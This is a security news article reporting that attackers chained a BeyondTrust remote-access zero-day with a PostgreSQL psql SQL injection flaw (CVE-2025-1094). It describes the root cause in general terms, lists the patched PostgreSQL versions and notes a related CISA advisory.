In a concerning development for cybersecurity, threat actors have exploited a zero-day vulnerability in BeyondTrust’s Privileged Remote Access (PRA) and Remote Support (RS) products. Additionally, they have taken advantage of a previously unknown SQL injection flaw in PostgreSQL. Rapid7 uncovered this alarming trend, highlighting the interconnected nature of modern cyber threats.
Overview of the Vulnerabilities
The PostgreSQL vulnerability, designated as CVE-2025-1094, has received a high CVSS score of 8.1. This flaw specifically affects the PostgreSQL interactive tool, psql. Security researcher Stephen Fewer explains that attackers can execute arbitrary code through SQL injection by leveraging the tool’s capability to run meta-commands.
Furthermore, Rapid7’s investigation into the BeyondTrust vulnerability, tracked as CVE-2024-12356, revealed that attackers must exploit CVE-2025-1094 to achieve remote code execution successfully. This connection underscores the critical need for organizations to address both vulnerabilities promptly.
Details of the PostgreSQL Vulnerability
The root cause of CVE-2025-1094 lies in PostgreSQL’s handling of invalid UTF-8 characters. This flaw enables attackers to exploit SQL injection vulnerabilities using the shortcut command “!”, which facilitates shell command execution. Fewer elaborates that attackers can control the operating system shell command executed through this meta-command or execute arbitrary SQL statements.
Mitigation and Updates
In response to the discovery of CVE-2025-1094, maintainers have released updates to address the vulnerability in the following versions:
- PostgreSQL 17 (Fixed in 17.3)
- PostgreSQL 16 (Fixed in 16.7)
- PostgreSQL 15 (Fixed in 15.11)
- PostgreSQL 14 (Fixed in 14.16)
- PostgreSQL 13 (Fixed in 13.19)
Organizations using these versions should apply the updates immediately to mitigate potential risks.
Broader Implications and CISA Advisory
This development coincides with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) adding a security flaw in SimpleHelp remote support software (CVE-2024-57727, CVSS score: 7.5) to its Known Exploited Vulnerabilities (KEV) catalog. Consequently, federal agencies must implement fixes by March 6, 2025. This requirement emphasizes the urgency of addressing vulnerabilities in remote support tools.
